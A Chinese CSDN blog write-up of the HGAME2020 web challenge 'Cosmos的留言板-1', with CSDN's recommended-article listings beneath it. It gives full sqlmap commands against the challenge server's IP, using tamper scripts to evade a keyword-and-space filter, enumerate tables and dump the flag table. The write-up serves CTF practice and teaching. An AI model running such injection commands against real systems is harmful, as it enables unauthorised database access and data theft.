HGAME2020 Cosmos的留言板-1

最新推荐文章于 2024-08-29 14:20:30 发布
最新推荐文章于 2024-08-29 14:20:30 发布
阅读量176 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19635147/article/details/105036306
版权

http://139.199.182.61/

 

 

非常明显嘛,就是考SQL注入,先去information_schema里面获取一些基本信息。

经过反复横跳,发现它的过滤方式是这样的

 

 

也就是删除敏感字段,所以可以用套娃的方式绕过这个过滤,然后发现空格被过滤了。

这次玩玩SQLMAP吧

 

 

用的那两个脚本是针对它过滤规则的,space2randomblank.py把空格换成其它有效字符,nonrecursivereplacement.py则是那个套娃脚本。

 

 

sqlmap -u "http://139.199.182.61/index.php?id=1" -D easysql --tables --tamper space2randomblank.py nonrecursivereplacement.py

 

 

可以看出这位出题人非常兴奋哈

 

sqlmap -u "http://139.199.182.61/index.php?id=1" -D easysql -T f1aggggggggggggg --dump --tamper space2randomblank.py nonrecursivereplacement.py

 

 

hgame{w0w_sql_InjeCti0n_Is_S0_IntereSting!!}

这个不是名
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hgame2020-week2-re
令则
02-10 1478
hgame week2 hgame ctf week2的逆向wp 题目链接: 链接: https://pan.baidu.com/s/1mmUxYJ-bfh-hf2akSiMRCA 密码: um92 文章目录hgame week2unpackcrackmebaby pybaby pycpython字节码pythonu unpack 这是一个elf脱壳的题目,我用的方法是先运行程序,然后使用gd...
HGAME2021--RE题解
FIshy000的博客
03-29 1640
前言 hgame 2021的逆向部分题解,一道nc题和一道安卓逆向没有做,每周的题目都看了看,做了四分之三左右,杭电的比赛题目出得很有水平,自己学到了很多东西,wp本来说每周都写的,但是懒,比赛都结束一个月了才偷工减料得写出来。有兴趣的师傅凑合着看看吧吧???? RE-week1 一杯阿帕茶 明显的TEA加密标志,后面分析为XXTEA加密 加密后的数据,刚好35位 #include <stdint.h> #include <stdio.h> #define DELTA 0x9e
2020 HGAME WEB_Week3[cosmos的留言板-2](基于时间的盲注)
Kaleido76的博客
02-10 524
一道SQL盲注题目[cosmos的留言板]
2020 HGAME WEB_Week3 [二发入魂][cosmos的二手市场]
Kaleido76的博客
02-08 589
一道mt_rand()伪随机题目[二发入魂]和一道条件竞争题目[cosmos的二手市场]
HGAME2020 reverse maze
YenKoc的博客
02-05 812
1.查壳,发现是64位的linux文件,由于虚拟机没装linux,只能静态调了 2.拖入ida分析,找到主函数 2.1.思路分析 1.先将对应的ASCII的转换成字符,因为迷宫题一般都是用wsad,或者lrdt来标志上下左右 2.v5=&unk_6020c4,标志着起始点 3.v5+=4,意味着右边移动4个字节 4.v6+=64,有点像二维数组里面的用地址来访问这种。 5.if(v...
2020 HGAME WEB_Week3 [序列之争]
Kaleido76的博客
02-08 1038
一道反序列化漏洞题目[序列之争]
HGAME 2020 web week3 writeup
stepone4ward的博客
02-07 854
序列之争-ordinal scale 首先source.zip获得源码,得知需要让rank为1即可获得flag 先找一下有没有反序列化的点,在monster类的构造函数中找到了unserialize方法 再找一下哪里可以让rank值变为1,在Rank类的析构函数中找到了让$_SESSION['rank']变为1的地方 如果我们可以满足$this->key === $this->serv...
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
HGAME 2020 web week2 writeup
stepone4ward的博客
02-04 1106
不要当懒狗
Hgame2020——WEB
Pdsdt1的博客
02-04 3457
文章首发于:Pdsdt’s Blog 武汉加油 祖国加油 在家这段时间本来是要做ELK的,队里说hgame开始了,就做了几道hgame的web,题目很有意思,在此记录一下 WEEK-1 0x01 Cosmos 的博客 访问站点,告诉我们站点使用了GitHub,猜测存在git泄露,查看config页面 访问该github地址,查看历史的commits 发现加密的字符串,使用base64解密,...
CTF条件竞争
夏日 の blog
02-10 2640
简介 条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时,就可能会出现 bug。尤其在当前我们的系统中大量对资源进行共享,如果处理不当的话,就会产生条件竞争漏洞。 个人理解 通俗的来讲就是假设程序同时处理存钱和取钱,当取钱"速度"大于存钱时,可能就会出现取钱后程序还未来得及将金额减少,程序又立马处理存钱,由此产生非预期的结果。 竞争...
2020 HGAME WEB_Week2
Kaleido76的博客
02-02 1537
包含题目[Cosmos的博客后台][Cosmos的留言板][Cosmos的新语言][Cosmos的聊天室]
乾元通渠道商中标湖南省煤业集团公司安全生产预防和应急救援能力建设装备配备采购项目
最新发布
QDLL123的博客
08-29 172
近日,乾元通渠道商中标湖南省煤业集团安全生产预防和应急救援能力建设装备配备采购项目,乾元通作为聚合通讯保障技术厂家,为项目一标段卫星通讯指挥车提供车载聚合路由器终端及系统。
【宝马中国-注册/登录安全分析报告】
08-26 1308
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
物联网安全框架:构建安全互联的未来世界
A526847的博客
08-26 467
物联网安全框架的构建是一个复杂而系统的工程,需要设备制造商、软件开发商、服务提供商和用户等多方共同努力。通过加强数据加密、身份认证、人工智能和区块链等技术的应用,推动统一安全标准的制定和实施,我们可以构建一个安全、可靠、互联的未来世界。在这个过程中,每一个参与者的努力都至关重要,让我们携手共进,为物联网的健康发展贡献自己的力量。
[ICS] 物理安全
08-26 1431
#工业控制系统气泡模型理论 #端口锁定 #物理端口安全 #设施监控 #爆炸物检测计划 #USB 端口阻塞
网络安全-安全渗透简介和安全渗透环境准备
weixin_57370131的博客
08-26 1164
安全渗透简介和安全渗透测试环境准备。
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加了从指定文件夹获取图片的功能: ```python import os from PIL import Image def get_images_from_folder(folder_path): images = [] for filename in os.listdir(folder_path): if filename.endswith(".png"): image_path = os.path.join(folder_path, filename) image = Image.open(image_path) images.append(image) return images # 指定文件夹路径 folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值